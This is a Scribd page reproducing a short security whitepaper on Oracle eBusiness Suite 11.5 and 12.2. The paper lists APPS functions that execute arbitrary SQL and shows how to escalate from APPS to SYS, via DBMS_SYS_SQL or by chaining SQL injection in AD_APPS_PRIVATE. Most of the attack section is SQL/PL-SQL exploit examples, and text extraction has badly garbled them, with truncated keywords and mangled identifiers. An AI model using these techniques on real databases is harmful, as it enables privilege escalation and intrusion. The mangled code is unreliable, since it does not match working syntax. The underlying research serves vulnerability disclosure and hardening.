Scribd Logo
Upload

Welcome to Scribd!

  • Us 16 Litchfield Hackproofing Oracle Ebusiness Suite WP 1

    Uploaded by

    Biker Boy
    21 views2 pages
    This document summarizes auxiliary inject functions in Oracle's eBusiness Suite 11.5 that allow execution of arbitrary SQL statements, even from a SELECT. It provides examples of functions like APPS.ASG_CUSTOM_PVT.EXEC_CMD that return values and can be used to inject SQL. It also explains how in eBusiness Suite 12.2, SQL can be executed as SYS user via APPS by chaining flaws that allow execution as SYSTEM and SQL injection in AD_APPS_PRIVATE. An SQL query is provided to search for other "EXEC" functions.

    Original Description:

    Oracle

    Original Title

    us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes auxiliary inject functions in Oracle's eBusiness Suite 11.5 that allow execution of arbitrary SQL statements, even from a SELECT. It provides examples of functions like APPS.ASG_CUSTOM_PVT.EXEC_CMD that return values and can be used to inject SQL. It also explains how in eBusiness Suite 12.2, SQL can be executed as SYS user via APPS by chaining flaws that allow execution as SYSTEM and SQL injection in AD_APPS_PRIVATE. An SQL query is provided to search for other "EXEC" functions.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    21 views2 pages

    Us 16 Litchfield Hackproofing Oracle Ebusiness Suite WP 1

    Uploaded by

    Biker Boy
    This document summarizes auxiliary inject functions in Oracle's eBusiness Suite 11.5 that allow execution of arbitrary SQL statements, even from a SELECT. It provides examples of functions like APPS.ASG_CUSTOM_PVT.EXEC_CMD that return values and can be used to inject SQL. It also explains how in eBusiness Suite 12.2, SQL can be executed as SYS user via APPS by chaining flaws that allow execution as SYSTEM and SQL injection in AD_APPS_PRIVATE. An SQL query is provided to search for other "EXEC" functions.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 2

    Auxiliary 

    Inject Functions in Oracle’s eBusiness Suite 11.5 
    David Litchfield 
    2nd June 2016 
     
     
    Auxiliary inject functions are functions that execute an arbitrary SQL statement and therefore 
    allow the execute of any SQL including DML and DDL even from a SELECT statement.(This is 
    achieved by specifying the ​AUTONMS_RCI ​ pragma in the declaration block) 
     
     
     
    APPS.ASG_CUSTOM_PVT.EXEC_CMD 
    This function returns a VARCHAR.  
    Example:  
    selct ap.ASG_CUTOMPVxmd('bgin  
    dbms_outp.line(r); 'fa  
     
     
    APPS.WIP_MASS_LOAD_UTILITIES.DYNAMIC_SQL  
    This function returns a NUMBER. 
    Example: 
    selct ap.WIP_MASLODUTEdynmiq('bg  
    dbms_outp.line(r|:xgf1
    _def2bin|:xprocsha); ',0mul  
     
     
    APPS.MSC_GET_NAME.EXECUTE_SQL_GETCOUNT 
    This function returns a NUMBER. 
    Example: 
    selct MSC_GETNA.XUQLO('bgin  
    dbms_outp.line(r); 'fa  
     
     
    APPS.BSC_UPDATE_UTIL.EXECUTE_IMMEDIATE 
    This function returns a NUMBER. 
    Example: 
    selct ap.BSC_UPDATEILxuimd('bgn  
    dbms_outp.line(r); 'fa  
    Note: does not exist in EBS R12 
     
     
    APPS.PSB_WS_ACCT1.DSQL 
    This function returns a NUMBER. 
    Example:  
    selct ap.b_w1dqxu('gin  
    dbms_outp.line(r); 'fa  
    Note: does not exist in EBS R12 
     
    Note: okc_wf.exec_wf_plsql and apps.okc_p_util.execute_sql can be used in DML inject points 
    (their code issues a savepoint) 
     
    Executing SQL as SYS via APPS in eBusiness Suite 11.5 
    By default APPS can execute DBMS_SYS_SQL. This allows APPS to run SQL as SYS. 
     
    selct ap.b_w1dqxu('rgm  
    autonms_rci; beg  
    c:=sy.dbm_qlopenur(); a,  
    'begin  
    dbms_outp.line(ycx'rv,
    ); end',bms_ql.ativ0r:=xcu(  
    dbms_ql.coeur(); n'fa  
     
     
     
    Executing SQL as SYS via APPS (via SYSTEM) in eBusiness Suite 12.2 
    In R12.2, APPS no longer has the privileges to directly execute DBMS_SYS_SQL. However, 
    SYSTEM does. Additionally, AD_APPS_PRIVATE owned by SYSTEM is vulnerable to SQL 
    injection and it can be executed by the APPS user. By chaining these flaws together we can still 
    execute SQL as SYS from APPS. 
     
    selct APS.G_CUTOMVEXD('bgin  
    sytem.ad_privol('bun|:1);  
    excut imda'lrpgons_;  
    number; gic:=sy.d_qlop()  
    sy.dbm_qlpareu(c, 'gin  
    dbms_outp.line(ycx'rv
    ',curent_s); d  
    dbms_ql.native, 0);r:=xcu(  
    dbms_ql.coeur(); n'­,fa  
     
     
    Appendix A ­ SQL to look for “EXEC” functions: 
    selct dinpakg_m|'.objfru  
    wher on='APSadpsit0bjc_mlk%QUERY;  
     
     

    You might also like